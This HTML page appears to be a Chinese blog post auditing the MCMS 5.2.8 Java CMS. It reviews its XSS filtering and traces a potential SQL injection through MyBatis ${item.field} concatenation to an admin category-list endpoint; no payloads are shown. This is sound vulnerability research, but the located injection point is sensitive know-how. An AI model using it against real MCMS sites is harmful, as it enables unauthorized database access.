<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="https:&#x2F;&#x2F;www.freebuf.com&#x2F;articles&#x2F;web&#x2F;360757.html 项目说明https:&#x2F;&#x2F;gitee.com&#x2F;mingSoft&#x2F;MCMS网上看了下这套代码的漏洞比较多，可以用来练练手    技术 名称 官网    Spring Framework 容器 http:&#x2F;&#x2F;projects.spring.io&#x2F;spring-framework   Spring Boot">
<meta property="og:type" content="article">
<meta property="og:title" content="【代码审计】Java MCMS 框架 5.2.8">
<meta property="og:url" content="https://godreams.cn/2024/11/08/WebSecurity/codeaudit/javacodemcms/index.html">
<meta property="og:site_name" content="g0dam">
<meta property="og:description" content="https:&#x2F;&#x2F;www.freebuf.com&#x2F;articles&#x2F;web&#x2F;360757.html 项目说明https:&#x2F;&#x2F;gitee.com&#x2F;mingSoft&#x2F;MCMS网上看了下这套代码的漏洞比较多，可以用来练练手    技术 名称 官网    Spring Framework 容器 http:&#x2F;&#x2F;projects.spring.io&#x2F;spring-framework   Spring Boot">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://godreams.cn/2024/11/08/WebSecurity/codeaudit/javacodemcms/image.png">
<meta property="og:image" content="https://godreams.cn/2024/11/08/WebSecurity/codeaudit/javacodemcms/image-1.png">
<meta property="og:image" content="https://godreams.cn/2024/11/08/WebSecurity/codeaudit/javacodemcms/image-2.png">
<meta property="og:image" content="https://godreams.cn/2024/11/08/WebSecurity/codeaudit/javacodemcms/image-3.png">
<meta property="og:image" content="https://godreams.cn/2024/11/08/WebSecurity/codeaudit/javacodemcms/image-4.png">
<meta property="og:image" content="https://godreams.cn/2024/11/08/WebSecurity/codeaudit/javacodemcms/image-5.png">
<meta property="og:image" content="https://godreams.cn/2024/11/08/WebSecurity/codeaudit/javacodemcms/image-6.png">
<meta property="og:image" content="https://godreams.cn/2024/11/08/WebSecurity/codeaudit/javacodemcms/image-7.png">
<meta property="og:image" content="https://godreams.cn/2024/11/08/WebSecurity/codeaudit/javacodemcms/image-8.png">
<meta property="article:published_time" content="2024-11-08T04:46:25.000Z">
<meta property="article:modified_time" content="2024-11-12T11:16:30.437Z">
<meta property="article:author" content="g0dam">
<meta property="article:tag" content="代码审计">
<meta property="article:tag" content="PHP">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://godreams.cn/2024/11/08/WebSecurity/codeaudit/javacodemcms/image.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>【代码审计】Java MCMS 框架 5.2.8</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
      <link rel="alternate" href="/true" title="g0dam" type="application/atom+xml" />
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/categories/">Categories</a></li><!--
     --><!--
       --><li><a href="/idea/">Idea</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/g0dam">Projects</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2024/11/12/WebSecurity/codeaudit/javasec/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2024/11/05/WebSecurity/codeaudit/javacodesqlinjection/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://godreams.cn/2024/11/08/WebSecurity/codeaudit/javacodemcms/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://godreams.cn/2024/11/08/WebSecurity/codeaudit/javacodemcms/&text=【代码审计】Java MCMS 框架 5.2.8"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://godreams.cn/2024/11/08/WebSecurity/codeaudit/javacodemcms/&title=【代码审计】Java MCMS 框架 5.2.8"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://godreams.cn/2024/11/08/WebSecurity/codeaudit/javacodemcms/&is_video=false&description=【代码审计】Java MCMS 框架 5.2.8"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=【代码审计】Java MCMS 框架 5.2.8&body=Check out this article: https://godreams.cn/2024/11/08/WebSecurity/codeaudit/javacodemcms/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://godreams.cn/2024/11/08/WebSecurity/codeaudit/javacodemcms/&title=【代码审计】Java MCMS 框架 5.2.8"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://godreams.cn/2024/11/08/WebSecurity/codeaudit/javacodemcms/&title=【代码审计】Java MCMS 框架 5.2.8"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://godreams.cn/2024/11/08/WebSecurity/codeaudit/javacodemcms/&title=【代码审计】Java MCMS 框架 5.2.8"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://godreams.cn/2024/11/08/WebSecurity/codeaudit/javacodemcms/&title=【代码审计】Java MCMS 框架 5.2.8"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://godreams.cn/2024/11/08/WebSecurity/codeaudit/javacodemcms/&name=【代码审计】Java MCMS 框架 5.2.8&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://godreams.cn/2024/11/08/WebSecurity/codeaudit/javacodemcms/&t=【代码审计】Java MCMS 框架 5.2.8"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%A1%B9%E7%9B%AE%E8%AF%B4%E6%98%8E"><span class="toc-number">1.</span> <span class="toc-text">项目说明</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E5%8F%B0XSS"><span class="toc-number">2.</span> <span class="toc-text">前台XSS</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5"><span class="toc-number">3.</span> <span class="toc-text">SQL注入</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9F%A5%E8%AF%A2%E5%88%86%E6%9E%90"><span class="toc-number">3.1.</span> <span class="toc-text">$ 查询分析</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%86%E6%9E%90"><span class="toc-number">3.2.</span> <span class="toc-text">&lt;include&gt;&lt;&#x2F;include&gt;分析</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0"><span class="toc-number">4.</span> <span class="toc-text">文件上传</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SSTI%EF%BC%9AFreemarker%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5"><span class="toc-number">5.</span> <span class="toc-text">SSTI：Freemarker模板注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#FastJson"><span class="toc-number">6.</span> <span class="toc-text">FastJson &lt;&#x3D;1.2.80 反序列化</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        【代码审计】Java MCMS 框架 5.2.8
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">g0dam</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-11-08T04:46:25.000Z" class="dt-published" itemprop="datePublished">2024-11-08</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/PHP/" rel="tag">PHP</a>, <a class="p-category" href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" rel="tag">代码审计</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <p><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/360757.html">https://www.freebuf.com/articles/web/360757.html</a></p>
<h2 id="项目说明"><a href="#项目说明" class="headerlink" title="项目说明"></a>项目说明</h2><p><a target="_blank" rel="noopener" href="https://gitee.com/mingSoft/MCMS">https://gitee.com/mingSoft/MCMS</a><br>网上看了下这套代码的漏洞比较多，可以用来练练手</p>
<table>
<thead>
<tr>
<th align="left">技术</th>
<th align="left">名称</th>
<th align="left">官网</th>
</tr>
</thead>
<tbody><tr>
<td align="left">Spring Framework</td>
<td align="left">容器</td>
<td align="left"><a target="_blank" rel="noopener" href="http://projects.spring.io/spring-framework/">http://projects.spring.io/spring-framework</a></td>
</tr>
<tr>
<td align="left">Spring Boot</td>
<td align="left">MVC框架</td>
<td align="left"><a target="_blank" rel="noopener" href="https://spring.io/projects/spring-boot">https://spring.io/projects/spring-boot</a></td>
</tr>
<tr>
<td align="left">Apache Shiro</td>
<td align="left">安全框架</td>
<td align="left"><a target="_blank" rel="noopener" href="http://shiro.apache.org/">http://shiro.apache.org</a></td>
</tr>
<tr>
<td align="left">Spring session</td>
<td align="left">分布式Session管理</td>
<td align="left"><a target="_blank" rel="noopener" href="http://projects.spring.io/spring-session">http://projects.spring.io/spring-session</a></td>
</tr>
<tr>
<td align="left">MyBatis</td>
<td align="left">ORM框架</td>
<td align="left"><a target="_blank" rel="noopener" href="http://www.mybatis.org/mybatis-3/zh/index.html">http://www.mybatis.org</a></td>
</tr>
<tr>
<td align="left">Freemarker</td>
<td align="left">视图框架</td>
<td align="left"><a target="_blank" rel="noopener" href="http://freemarker.foofun.cn/">http://freemarker.foofun.cn</a></td>
</tr>
<tr>
<td align="left">PageHelper</td>
<td align="left">MyBatis分页插件</td>
<td align="left"><a target="_blank" rel="noopener" href="http://git.oschina.net/free/Mybatis_PageHelper">http://git.oschina.net/free/Mybatis_PageHelper</a></td>
</tr>
<tr>
<td align="left">Log4J</td>
<td align="left">日志组件</td>
<td align="left"><a target="_blank" rel="noopener" href="http://logging.apache.org/">http://logging.apache.org</a></td>
</tr>
<tr>
<td align="left">Maven</td>
<td align="left">项目构建</td>
<td align="left"><a target="_blank" rel="noopener" href="http://maven.apache.org/">http://maven.apache.org</a></td>
</tr>
<tr>
<td align="left">Elasticsearch</td>
<td align="left">分布式搜索引擎</td>
<td align="left"><a target="_blank" rel="noopener" href="https://www.elastic.co/">https://www.elastic.co</a></td>
</tr>
<tr>
<td align="left">Redis</td>
<td align="left">分布式缓存数据库</td>
<td align="left"><a target="_blank" rel="noopener" href="https://redis.io/">https://redis.io</a></td>
</tr>
<tr>
<td align="left">hutool</td>
<td align="left">工具类</td>
<td align="left"><a target="_blank" rel="noopener" href="http://hutool.mydoc.io/">http://hutool.mydoc.io</a></td>
</tr>
</tbody></table>
<table>
<thead>
<tr>
<th align="left">技术</th>
<th align="left">常见安全问题</th>
<th align="left">防范措施</th>
</tr>
</thead>
<tbody><tr>
<td align="left"><strong>Spring Framework</strong></td>
<td align="left">配置漏洞（如未正确配置 CSRF、CORS），数据暴露风险</td>
<td align="left">确保正确配置 CSRF 和 CORS，启用 Spring Security 进行鉴权，避免不必要的 Bean 暴露</td>
</tr>
<tr>
<td align="left"><strong>Spring Boot</strong></td>
<td align="left">默认配置可能暴露管理端点（如 <code>/actuator</code>），可能引发信息泄露</td>
<td align="left">在 <code>application.properties</code> 中禁用生产环境的管理端点，限制访问权限</td>
</tr>
<tr>
<td align="left"><strong>Apache Shiro</strong></td>
<td align="left">鉴权绕过（特别是路径拦截不当）、密码加密强度不足</td>
<td align="left">确保路径拦截规则严格且测试充分，加密配置中使用高强度散列算法</td>
</tr>
<tr>
<td align="left"><strong>Spring Session</strong></td>
<td align="left">会话固定攻击（Session Fixation）、会话劫持</td>
<td align="left">使用 <code>https</code> 保护传输，加密存储敏感会话信息，定期刷新会话</td>
</tr>
<tr>
<td align="left"><strong>MyBatis</strong></td>
<td align="left">SQL 注入</td>
<td align="left">使用 <code>#&#123;&#125;</code> 语法传递参数，避免直接拼接 SQL，定期检查 Mapper 文件</td>
</tr>
<tr>
<td align="left"><strong>Freemarker</strong></td>
<td align="left">模板注入（Template Injection）</td>
<td align="left">避免使用用户输入直接作为模板变量，开启输出转义</td>
</tr>
<tr>
<td align="left"><strong>PageHelper</strong></td>
<td align="left">分页参数未验证，可能导致注入</td>
<td align="left">校验分页参数的合法性，设置最大分页限制</td>
</tr>
<tr>
<td align="left"><strong>Log4J</strong></td>
<td align="left">日志注入，JNDI 注入风险（Log4Shell）</td>
<td align="left">避免日志记录用户直接输入内容，升级到安全版本（Log4j2 最新版）</td>
</tr>
<tr>
<td align="left"><strong>Maven</strong></td>
<td align="left">使用的依赖库可能包含已知漏洞</td>
<td align="left">定期检查依赖库版本，使用 Maven Security Scanner 检测</td>
</tr>
<tr>
<td align="left"><strong>Elasticsearch</strong></td>
<td align="left">默认配置未认证，可能被未授权访问</td>
<td align="left">设置访问控制策略，加密存储，禁用默认的 <code>_cat</code> 等敏感接口</td>
</tr>
<tr>
<td align="left"><strong>Redis</strong></td>
<td align="left">未授权访问，持久化数据泄露风险</td>
<td align="left">禁用不必要的外部网络连接，配置密码和 IP 白名单</td>
</tr>
<tr>
<td align="left"><strong>Hutool</strong></td>
<td align="left">安全性依赖具体工具函数的实现</td>
<td align="left">使用时需验证 Hutool 工具类的输入输出是否合法，避免直接处理用户输入</td>
</tr>
</tbody></table>
<h2 id="前台XSS"><a href="#前台XSS" class="headerlink" title="前台XSS"></a>前台XSS</h2><p>其实感觉也不算是漏洞，只是做给自己看的<br><img src="/2024/11/08/WebSecurity/codeaudit/javacodemcms/image.png"><br>主要原因是上面在报错返回时，将恶意代码也添加在了content当中一起返回<br><img src="/2024/11/08/WebSecurity/codeaudit/javacodemcms/image-1.png" alt="可以看到下面的调用栈信息"><br>这里可以跟进分析下是怎么判断的：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> String <span class="title function_">clean</span><span class="params">(String name, String content)</span> &#123;</span><br><span class="line">        <span class="type">String</span> <span class="variable">result</span> <span class="operator">=</span> Jsoup.clean(content, <span class="string">&quot;&quot;</span>, whitelist, outputSettings);</span><br><span class="line">        result = Parser.unescapeEntities(result, <span class="literal">true</span>);</span><br><span class="line">        <span class="keyword">if</span> (content.equals(result) &amp;&amp; SqlInjectionUtil.isSqlValid(content)) &#123;</span><br><span class="line">            <span class="keyword">return</span> content;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="type">String</span> <span class="variable">uri</span> <span class="operator">=</span> SpringUtil.getRequest().getRequestURI();</span><br><span class="line">            LOGGER.debug(<span class="string">&quot;接口不符合XSS规则:&#123;&#125;&quot;</span>, uri);</span><br><span class="line">            LOGGER.debug(<span class="string">&quot;参数名:&#123;&#125; 参数值:&#123;&#125;&quot;</span>, name, content);</span><br><span class="line">            <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">BusinessException</span>(<span class="string">&quot;参数异常:&quot;</span> + content);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p>在上面的 Jsoup.clean 中就已经清除了，Jsoup.clean 是 Jsoup 库的一部分，Jsoup 是一个开源的 Java 库，专门用于解析、清理和操作 HTML。Jsoup 可以从 HTML 中移除不安全的内容，因此常用于防止 XSS 攻击。<br><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_33915826/article/details/104484336">使用Jsoup.clean消除不受信任的HTML (防止XSS攻击)</a></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> String <span class="title function_">clean</span><span class="params">(String bodyHtml, String baseUri, Whitelist whitelist, Document.OutputSettings outputSettings)</span> &#123;</span><br><span class="line">        <span class="type">Document</span> <span class="variable">dirty</span> <span class="operator">=</span> parseBodyFragment(bodyHtml, baseUri);</span><br><span class="line">        <span class="type">Cleaner</span> <span class="variable">cleaner</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Cleaner</span>(whitelist);</span><br><span class="line">        <span class="type">Document</span> <span class="variable">clean</span> <span class="operator">=</span> cleaner.clean(dirty);</span><br><span class="line">        clean.outputSettings(outputSettings);</span><br><span class="line">        <span class="keyword">return</span> clean.body().html();</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p> bodyHtml 字符串解析为一个 Document 对象，称为 dirty（“未清理”文档）。<br><img src="/2024/11/08/WebSecurity/codeaudit/javacodemcms/image-2.png"><br><img src="/2024/11/08/WebSecurity/codeaudit/javacodemcms/image-3.png" alt="这里clean之后就已经不包含恶意代码了"><br>注意到前面的代码中还有对sql代码的过滤，跟进去看到了规则如下：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">final</span> <span class="type">Pattern</span> <span class="variable">sqlPattern</span> <span class="operator">=</span> Pattern.compile(<span class="string">&quot;(?:&#x27;)|(?:--)|(/\\*(?:.|[\\n\\r])*?\\*/)|(\\b(select|update|and|or|delete|insert|trancate|char|substr|ascii|declare|chr|mid|exec|count|master|into|drop|execute)\\b)&quot;</span>, <span class="number">2</span>);</span><br></pre></td></tr></table></figure>
<h2 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL注入</h2><p>前面已经知道了MCMS使用mybaits作为持久层框架，可以分析相应的映射文件，在其中查找使用<code>$</code>拼接的参数。除此之外还有种漏洞思路，<code>&lt;include&gt;&lt;/include&gt;</code>标签，会将一段复用的SQL代码拼接入当前语句中。</p>
<h3 id="查询分析"><a href="#查询分析" class="headerlink" title="$ 查询分析"></a>$ 查询分析</h3><p>在<code>IContentDao.xml</code>中找到了用到了，这个先暂时放着</p>
<h3 id="分析"><a href="#分析" class="headerlink" title="&lt;include&gt;&lt;/include&gt;分析"></a><code>&lt;include&gt;&lt;/include&gt;</code>分析</h3><p>三个xml文件中都包含有下面的这个：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">include</span> <span class="attr">refid</span>=<span class="string">&quot;net.mingsoft.base.dao.IBaseDao.sqlWhere&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">include</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>进入到这个类里面看看到底是什么<br><img src="/2024/11/08/WebSecurity/codeaudit/javacodemcms/image-4.png"><br>可以看到其中有大量的$，主要是用到了<code>$&#123;item.field&#125;</code>，分析得到这个是来自于 sqlWhereList ，其中的field变量是可能存在的注入点。<br>接下来看看这个是否可控，返回去查看方法调用的点，在ICategoryDao.xml，找select id&#x3D;”query”对应的接口，没有找到，进入到其基类中查找，找到了</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">interface</span> <span class="title class_">IBaseDao</span>&lt;E&gt; <span class="keyword">extends</span> <span class="title class_">BaseMapper</span>&lt;E&gt; &#123;</span><br><span class="line">	...</span><br><span class="line">    	List&lt;E&gt; <span class="title function_">query</span><span class="params">(BaseEntity entity)</span>;</span><br><span class="line">    ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>进一步找query的实现类，有三个，但只有一个接受参数</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// net/mingsoft/base/biz/impl/BaseBizImpl.java</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">abstract</span> <span class="keyword">class</span> <span class="title class_">BaseBizImpl</span>&lt;M <span class="keyword">extends</span> <span class="title class_">BaseMapper</span>&lt;T&gt;,T&gt; <span class="keyword">extends</span> <span class="title class_">ServiceImpl</span>&lt;M,T&gt; <span class="keyword">implements</span> <span class="title class_">IBaseBiz</span>&lt;T&gt; &#123;</span><br><span class="line">    ...</span><br><span class="line">    	<span class="meta">@Override</span></span><br><span class="line">	<span class="keyword">public</span> List&lt;T&gt; <span class="title function_">query</span><span class="params">(BaseEntity entity)</span> &#123;</span><br><span class="line">		<span class="comment">// TODO Auto-generated method stub</span></span><br><span class="line">		<span class="keyword">return</span> getDao().query(entity);</span><br><span class="line">	&#125;</span><br><span class="line">	...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>接下来再找找看哪里用了<br><img src="/2024/11/08/WebSecurity/codeaudit/javacodemcms/image-5.png"><br>跟进<code>net/mingsoft/cms/action/CategoryAction.java</code></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@Api(tags=&#123;&quot;后端-内容模块接口&quot;&#125;)</span></span><br><span class="line"><span class="meta">@Controller(&quot;cmsCategoryAction&quot;)</span></span><br><span class="line"><span class="meta">@RequestMapping(&quot;/$&#123;ms.manager.path&#125;/cms/category&quot;)</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">CategoryAction</span> <span class="keyword">extends</span> <span class="title class_">BaseAction</span> &#123;</span><br><span class="line">    ......</span><br><span class="line">	<span class="meta">@RequestMapping(value=&quot;/list&quot;,method = &#123;RequestMethod.GET, RequestMethod.POST&#125;)</span></span><br><span class="line">	<span class="meta">@ResponseBody</span></span><br><span class="line">	<span class="meta">@RequiresPermissions(&quot;cms:category:view&quot;)</span></span><br><span class="line">	<span class="keyword">public</span> ResultData <span class="title function_">list</span><span class="params">(<span class="meta">@ModelAttribute</span> <span class="meta">@ApiIgnore</span> CategoryEntity category)</span> &#123;</span><br><span class="line">		BasicUtil.startPage();</span><br><span class="line">		<span class="type">List</span> <span class="variable">categoryList</span> <span class="operator">=</span> categoryBiz.query(category);</span><br><span class="line">		<span class="keyword">return</span> ResultData.build().success(<span class="keyword">new</span> <span class="title class_">EUListBean</span>(categoryList,(<span class="type">int</span>) BasicUtil.endPage(categoryList).getTotal()));</span><br><span class="line">	&#125;</span><br><span class="line">    ......</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>存在外部可访问接口，<code>@RequestMapping(&quot;/$&#123;ms.manager.path&#125;/cms/category&quot;)</code>，<code>$&#123;ms.manager.path&#125;</code>在配置中为ms，找到具体的应用点，传入的参数是 CategoryEntity 类型的：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment">	 * 查询分类列表接口</span></span><br><span class="line"><span class="comment">	 * <span class="doctag">@param</span> category 栏目实体</span></span><br><span class="line"><span class="comment">	 * <span class="doctag">@return</span></span></span><br><span class="line"><span class="comment">	 */</span></span><br><span class="line">	<span class="meta">@ApiOperation(value = &quot;查询分类列表接口&quot;)</span></span><br><span class="line">	<span class="meta">@ApiImplicitParams(&#123;</span></span><br><span class="line"><span class="meta">    	@ApiImplicitParam(name = &quot;categoryTitle&quot;, value = &quot;栏目管理名称&quot;, required =false,paramType=&quot;query&quot;),</span></span><br><span class="line"><span class="meta">    	@ApiImplicitParam(name = &quot;categoryParentId&quot;, value = &quot;父类型编号&quot;, required =false,paramType=&quot;query&quot;),</span></span><br><span class="line"><span class="meta">    &#125;)</span></span><br><span class="line">	<span class="meta">@RequestMapping(value=&quot;/list&quot;,method = &#123;RequestMethod.GET, RequestMethod.POST&#125;)</span></span><br><span class="line">	<span class="meta">@ResponseBody</span></span><br><span class="line">	<span class="meta">@RequiresPermissions(&quot;cms:category:view&quot;)</span></span><br><span class="line">	<span class="keyword">public</span> ResultData <span class="title function_">list</span><span class="params">(<span class="meta">@ModelAttribute</span> <span class="meta">@ApiIgnore</span> CategoryEntity category)</span> &#123;</span><br><span class="line">		BasicUtil.startPage();</span><br><span class="line">		<span class="type">List</span> <span class="variable">categoryList</span> <span class="operator">=</span> categoryBiz.query(category);</span><br><span class="line">		<span class="keyword">return</span> ResultData.build().success(<span class="keyword">new</span> <span class="title class_">EUListBean</span>(categoryList,(<span class="type">int</span>) BasicUtil.endPage(categoryList).getTotal()));</span><br><span class="line">	&#125;</span><br></pre></td></tr></table></figure>
<p>跟进 CategoryEntity 分析其结构，进一步找 又跟进到BaseEntity找<code>qlWhereList</code>和<code>SQLwhere</code>，SQLwhere是json格式，分析可能存在注入点。<br><img src="/2024/11/08/WebSecurity/codeaudit/javacodemcms/image-6.png" alt="抓包分析"></p>
